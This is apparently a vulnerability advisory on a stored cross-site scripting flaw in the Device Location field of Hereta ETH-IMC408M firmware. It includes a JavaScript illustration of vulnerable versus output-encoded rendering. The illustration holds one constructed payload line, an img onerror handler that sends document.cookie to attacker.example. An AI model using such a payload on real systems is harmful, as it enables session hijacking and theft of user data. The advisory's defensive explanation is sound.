Impact
The vulnerability is a stored cross‑site scripting flaw (CWE‑79) in Hereta ETH‑IMC408M firmware version 1.0.15 and earlier. An authenticated attacker can edit the Device Location field through the System Status interface and save arbitrary HTML or JavaScript in it. Because the stored value is later written into the status page without being neutralized (HTML‑encoded), the script runs in the browser of every user who views that page, in that user's own session. That allows defacement of the portal, exfiltration of data visible to the victim, or hijacking of the victim's session, so a low‑privileged account can reach any higher‑privileged user who opens the status page.
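To make the mechanism concrete, the following is an added example, not code from Hereta or the ETH‑IMC408M firmware: a stand‑in for a status page that renders a stored, user‑editable Device Location value, shown in the vulnerable form the advisory describes and in a hardened form. The HTML layout, the field handling and the validation limits are assumptions for illustration, and the sample payload is constructed.

```javascript
// Added example, not Hereta code. Models a web UI that stores a user-editable
// "Device Location" string and later renders it on a status page.
// Layout, field names and limits below are assumptions for illustration.

// Minimal HTML entity encoder for text placed inside an element body.
// Attribute, URL and JavaScript contexts would need their own encoders.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern (CWE-79): the stored string is interpolated verbatim, so any
// markup an authenticated user saved runs in every viewer's browser session.
function renderStatusVulnerable(device) {
  return `<table><tr><th>Device Location</th><td>${device.location}</td></tr></table>`;
}

// Hardened pattern: encode at output time. This is the real fix; the input
// filter further down is only defence in depth.
function renderStatusHardened(device) {
  return `<table><tr><th>Device Location</th><td>${escapeHtml(device.location)}</td></tr></table>`;
}

// Defence in depth on the write path. A location is free text, so an allowlist
// of printable characters plus a length cap is reasonable (assumed limits).
const LOCATION_MAX_LEN = 64;
function validateLocation(value) {
  if (typeof value !== 'string') return false;
  if (value.length === 0 || value.length > LOCATION_MAX_LEN) return false;
  // Letters, digits, space and common punctuation; no angle brackets or quotes.
  return /^[A-Za-z0-9 .,:#()\/_-]+$/.test(value);
}

// Constructed sample payload of the kind a stored XSS in this field carries:
// an image tag whose error handler runs attacker script in the viewer's session.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Check: does the rendered location cell still contain a raw "<" that a browser
// would parse as a tag? Only the cell is inspected, so template tags are ignored.
function locationCellHasRawTag(html) {
  const m = html.match(/<td>([\s\S]*?)<\/td>/);
  return m !== null && /<\s*[a-z!\/]/i.test(m[1]);
}

// Runs the payload through both render paths and the input filter.
function demo() {
  const device = { location: SAMPLE_PAYLOAD };
  return {
    vulnerable: locationCellHasRawTag(renderStatusVulnerable(device)),   // true
    hardened: locationCellHasRawTag(renderStatusHardened(device)),       // false
    inputRejected: !validateLocation(SAMPLE_PAYLOAD),                     // true
    benignAccepted: validateLocation('Rack 3, Row B (Building 2)'),       // true
  };
}
```

The point of `demo()` is the asymmetry: the same stored value is harmless once it is entity‑encoded at render time, while the input allowlist merely narrows what can be saved and would not protect a page that renders values from other sources.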
Affected Systems
Shenzhen Hereta Technology has issued this advisory for its ETH‑IMC408M wireless intrusion detection system. The flaw affects firmware versions 1.0.15 and earlier. This section names no fixed firmware version, so every device running 1.0.15 or an older release should be treated as affected until the vendor states otherwise.
Risk and Exploitability
The CVSS base score of 5.1 places the vulnerability in the medium severity range. The EPSS score is below 1 percent, so the predicted probability of exploitation in the wild is low, and the issue is not listed in CISA's KEV catalog. Exploitation requires an authenticated session on the device's web interface, so an attacker must first obtain valid credentials; network access alone is not enough. Once the payload is saved, no further attacker interaction is needed: the script runs whenever another logged‑in user views the status page. The practical risk is therefore highest where the web interface is reachable from untrusted networks, credentials are shared or weakly protected, and administrators routinely view the status page.
OpenCVE Enrichment